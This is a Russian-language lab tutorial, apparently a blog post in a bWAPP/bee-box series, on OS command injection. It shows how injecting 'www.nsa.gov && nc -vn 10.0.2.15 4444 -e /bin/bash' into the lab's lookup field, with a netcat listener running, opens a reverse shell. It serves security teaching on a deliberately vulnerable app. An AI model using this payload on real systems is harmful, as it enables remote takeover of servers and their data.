#9 Уязвимость — OS Command Injection.
Внедрение команд ОС (также известное как внедрение команд) — это уязвимость веб-безопасности, которая позволяет злоумышленнику выполнять произвольные команды операционной системы (ОС) на сервере, на котором выполняется приложение, и, как правило, полностью скомпрометировать приложение и все его данные.
Очень часто злоумышленник может использовать уязвимость внедрения команд ОС, чтобы скомпрометировать другие части инфраструктуры хостинга, используя доверительные отношения для отражения атаки на другие системы в организации.
Рассмотрим наглядно данную уязвимость на примере машины bee-box (buggy web-application). Перейдем на вкладку «OS Command Injection»:
![Перейдем на вкладку «OS Command Injection»](https://timcore.ru/wp-content/uploads/2021/05/001-8-1024x499.png)
Жмем кнопку «Lookup», и видим подробности сайта www.nsa.gov:
![Жмем кнопку «Lookup», и видим подробности сайта www.nsa.gov](https://timcore.ru/wp-content/uploads/2021/05/002-8-1024x502.png)
Нам нужно установить обратное соединение с данной веб-страницей на свою машину. Это делается с помощью инструмента «netcat», а команда будет выглядеть как: «www.nsa.gov && nc -vn 10.0.2.15 4444 -e /bin/bash». Обратите внимание, что перед тем как вводить данную команду в поле ввода, нам необходимо прослушивать входящее соединение. Это также делается с помощью «netcat».
Итак по-порядку. Сначала узнаем наш ip-адрес:
![ifconfig](https://timcore.ru/wp-content/uploads/2021/05/003-7-1024x631.png)
Далее прослушиваем входящее соединение по порту 4444:
![прослушиваем входящее соединение по порту 4444](https://timcore.ru/wp-content/uploads/2021/05/004-7-1024x636.png)
После вводим в поле для информации нашу запись, которая имеет вид: «www.nsa.gov && nc -vn 10.0.2.15 4444 -e /bin/bash» и получаем входящее соединение:
![www.nsa.gov && nc -vn 10.0.2.15 4444 -e /bin/bash](https://timcore.ru/wp-content/uploads/2021/05/005-6-1024x627.png)
Можем вводить разные команды:
![можем вводить разные команды](https://timcore.ru/wp-content/uploads/2021/05/006-6-1024x626.png)
Это очень опасная уязвимость, повторюсь, но все же это так и есть.
На этом все. Всем хорошего дня!
#2 bWAPP (Bee-Box) — первоначальная настройка.
#3 Уязвимость HTMl Injection — Reflected (GET) уровень (Medium).
#4 Уязвимость HTML Injection — Reflected (POST) уровень (Low).
#5 Уязвимость HTML Injection — Reflected (POST) средний уровень.
#6 Уязвимость HTML Injection — Reflected (Current URL) уровень low.